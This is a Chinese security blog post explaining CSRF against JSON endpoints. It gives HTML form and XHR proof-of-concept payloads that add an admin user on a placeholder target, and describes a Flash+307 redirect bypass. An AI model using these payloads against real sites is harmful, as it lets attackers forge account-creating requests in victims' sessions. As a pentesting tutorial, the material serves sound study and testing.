<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CSRF," />










<meta name="description" content="Json格式的CSRF有这样一个场景，新增用户不校验Referer，没有token，马上可以想到CSRF漏洞。但它又有一些不同的是它提交的数据是Json格式的，请求包类似： POST &#x2F;api&#x2F;add HTTP&#x2F;1.1 Host: target.com User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko&#x2F;">
<meta name="keywords" content="CSRF">
<meta property="og:type" content="article">
<meta property="og:title" content="Json格式的CSRF">
<meta property="og:url" content="http:&#x2F;&#x2F;yoursite.com&#x2F;2019&#x2F;07&#x2F;08&#x2F;Json%E6%A0%BC%E5%BC%8F%E7%9A%84CSRF&#x2F;index.html">
<meta property="og:site_name" content="Sharp_T&#39;s Blog">
<meta property="og:description" content="Json格式的CSRF有这样一个场景，新增用户不校验Referer，没有token，马上可以想到CSRF漏洞。但它又有一些不同的是它提交的数据是Json格式的，请求包类似： POST &#x2F;api&#x2F;add HTTP&#x2F;1.1 Host: target.com User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko&#x2F;">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https:&#x2F;&#x2F;ftp.bmp.ovh&#x2F;imgs&#x2F;2019&#x2F;11&#x2F;6f3ba4b5502fe8ae.png">
<meta property="og:image" content="https:&#x2F;&#x2F;i.bmp.ovh&#x2F;imgs&#x2F;2020&#x2F;03&#x2F;23f70022bab710a4.png">
<meta property="og:updated_time" content="2020-03-16T07:32:34.242Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;ftp.bmp.ovh&#x2F;imgs&#x2F;2019&#x2F;11&#x2F;6f3ba4b5502fe8ae.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/07/08/Json格式的CSRF/"/>





  <title>Json格式的CSRF | Sharp_T's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sharp_T's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/07/08/Json%E6%A0%BC%E5%BC%8F%E7%9A%84CSRF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Sharp_T">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sharp_T's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Json格式的CSRF</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-08T14:29:24+08:00">
                2019-07-08
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="Json格式的CSRF"><a href="#Json格式的CSRF" class="headerlink" title="Json格式的CSRF"></a>Json格式的CSRF</h2><p>有这样一个场景，新增用户不校验Referer，没有token，马上可以想到CSRF漏洞。但它又有一些不同的是它提交的数据是Json格式的，请求包类似：</p>
<pre><code>POST /api/add HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
x-requested-with: XMLHttpRequest
Content-Length: 124
Origin: https://target.com
Connection: close
Referer: https://target.com/account/unitivesubacct/add?service=erp&amp;bg_source=7&amp;part_type=1&amp;feconfig=erp.chains
Cookie: abcdefg

{&quot;login&quot;:&quot;admin1&quot;,&quot;password&quot;:&quot;123456&quot;,&quot;mobile&quot;:&quot;13000000000&quot;,&quot;intercode&quot;:&quot;86&quot;,&quot;name&quot;:&quot;&quot;,&quot;requestCode&quot;:&quot;&quot;,&quot;responseCode&quot;:&quot;&quot;}</code></pre><p>POST提交的不是表单，而是Json数组，如果我们直接使用burp生成poc，生成的是以表单形式提交的，类似：</p>
<p><img src="https://ftp.bmp.ovh/imgs/2019/11/6f3ba4b5502fe8ae.png" alt=""></p>
<p>直接使用这个poc会出现一个问题，post数据包会多了一个”=”：</p>
<pre><code>`{&quot;login&quot;:&quot;admin1&quot;,&quot;password&quot;:&quot;123456&quot;,&quot;mobile&quot;:&quot;13000000000&quot;,&quot;intercode&quot;:&quot;86&quot;,&quot;name&quot;:&quot;&quot;,&quot;requestCode&quot;:&quot;&quot;,&quot;responseCode&quot;:&quot;&quot;}=`</code></pre><h2 id="补全Json格式"><a href="#补全Json格式" class="headerlink" title="补全Json格式"></a>补全Json格式</h2><p>这个=就导致服务端的Json解析器解析不了，然后报错。<br>这种情况下，我们可以以给value赋值从而对这个“=”后面的数据进行补全，使得其构成一个完整的JSON格式，可避免解析器报错:</p>
<pre><code>&lt;html&gt;  
&lt;form action=&quot;http://target.com/api/add&quot; method=&quot;POST&quot; enctype=&quot;text/plain&quot;&gt;  
&lt;input name=&apos;{&quot;login&quot;:&quot;admin1&quot;,&quot;password&quot;:&quot;123456&quot;,&quot;mobile&quot;:&quot;13000000000&quot;,&quot;intercode&quot;:&quot;86&quot;,&quot;name&quot;:&quot;&quot;,&quot;requestCode&quot;:&quot;&quot;,&quot;responseCode&quot;:&quot;&quot;, &quot;&quot;:&quot;&apos; value=&apos;test&quot;}&apos;type=&apos;hidden&apos;&gt;  
&lt;input type=submit&gt;  
&lt;/form&gt;  
&lt;/html&gt; </code></pre><p>这样POST的数据就变成一个正确的Json格式了，可能可以避免报错。</p>
<pre><code>{&quot;login&quot;:&quot;admin1&quot;,&quot;password&quot;:&quot;123456&quot;,&quot;mobile&quot;:&quot;13000000000&quot;,&quot;intercode&quot;:&quot;86&quot;,&quot;name&quot;:&quot;&quot;,&quot;requestCode&quot;:&quot;&quot;,&quot;responseCode&quot;:&quot;&quot;,&quot;&quot;:&quot;=&quot;}</code></pre><h2 id="设置Content-Type"><a href="#设置Content-Type" class="headerlink" title="设置Content-Type"></a>设置Content-Type</h2><p>但是这里还有一个问题，在原始的数据包里Content-Type的值是application/json，而以form去提交是没法设置application/json的，在这里设置为text/plain。<br>如果服务器对Content-Type有校验，这里就会报错。所以需要将Content-Type设为application/json。<br>这里可以使用XHR实现，poc类似：</p>
<pre><code>&lt;html&gt;
  &lt;body&gt;
    &lt;script&gt;
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open(&quot;POST&quot;, &quot;http://target.com/api/add&quot;, true);
        xhr.setRequestHeader(&quot;Accept&quot;, &quot;*/*&quot;);
        xhr.setRequestHeader(&quot;Accept-Language&quot;, &quot;zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&quot;);
        xhr.setRequestHeader(&quot;Content-Type&quot;, &quot;application/json; charset=utf-8&quot;);
        xhr.withCredentials = true;
        xhr.send(JSON.stringify({&quot;login&quot;:&quot;admin1&quot;,&quot;password&quot;:&quot;123456&quot;,&quot;mobile&quot;:&quot;13000000000&quot;,&quot;intercode&quot;:&quot;86&quot;,&quot;name&quot;:&quot;&quot;,&quot;requestCode&quot;:&quot;&quot;,&quot;responseCode&quot;:&quot;&quot;});
    }
    &lt;/script&gt;
    &lt;form action=&quot;#&quot;&gt;
      &lt;input type=&quot;button&quot; value=&quot;Submit request&quot; onclick=&quot;submitRequest();&quot;/&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</code></pre><p>但是这种方法会先进行一次OPTIONS预请求：</p>
<pre><code>OPTIONS /api/add HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: POST
Access-Control-Request-Headers: content-type
Origin: null
Connection: close</code></pre><p>如果服务器并未设置允许任意域名跨域请求，就会拒绝options预请求。</p>
<h2 id="Flash-307跳转"><a href="#Flash-307跳转" class="headerlink" title="Flash+307跳转"></a>Flash+307跳转</h2><p>这里可以使用Flash+307跳转绕过（但是该方法在2018年之后版本的浏览器应该都不行了）</p>
<p>需要环境如下：</p>
<ul>
<li>能发起HTTP请求的swf文件(csrf_json.swf)</li>
<li>307跳转(307.php)</li>
<li>上面两个文件同域</li>
</ul>
<p>参考：<a href="https://github.com/sp1d3r/swf_json_csrf" target="_blank" rel="noopener">https://github.com/sp1d3r/swf_json_csrf</a></p>
<p>使用1lastBr3ath提供的测试POC进行测试：</p>
<p><a href="http://cm2.pw/crossdomain" target="_blank" rel="noopener">http://cm2.pw/crossdomain</a></p>
<p>POC:</p>
<pre><code>http://cm2.pw/redirect?url=http://xxxxtarget.com/add&amp;status=307</code></pre><p><img src="https://i.bmp.ovh/imgs/2020/03/23f70022bab710a4.png" alt=""></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CSRF/" rel="tag"># CSRF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/08/hello-world/" rel="next" title="Hello World">
                <i class="fa fa-chevron-left"></i> Hello World
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/26/%E5%BD%93CSRF%E9%81%87%E4%B8%8AX-Requested-With/" rel="prev" title="当CSRF遇上X-Requested-With">
                当CSRF遇上X-Requested-With <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/uploads/avatar.png"
                alt="Sharp_T" />
            
              <p class="site-author-name" itemprop="name">Sharp_T</p>
              <p class="site-description motion-element" itemprop="description">剑气纵横三万里</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.t00ls.net/" title="T00LS" target="_blank">T00LS</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Json格式的CSRF"><span class="nav-number">1.</span> <span class="nav-text">Json格式的CSRF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#补全Json格式"><span class="nav-number">2.</span> <span class="nav-text">补全Json格式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#设置Content-Type"><span class="nav-number">3.</span> <span class="nav-text">设置Content-Type</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Flash-307跳转"><span class="nav-number">4.</span> <span class="nav-text">Flash+307跳转</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Sharp_T</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
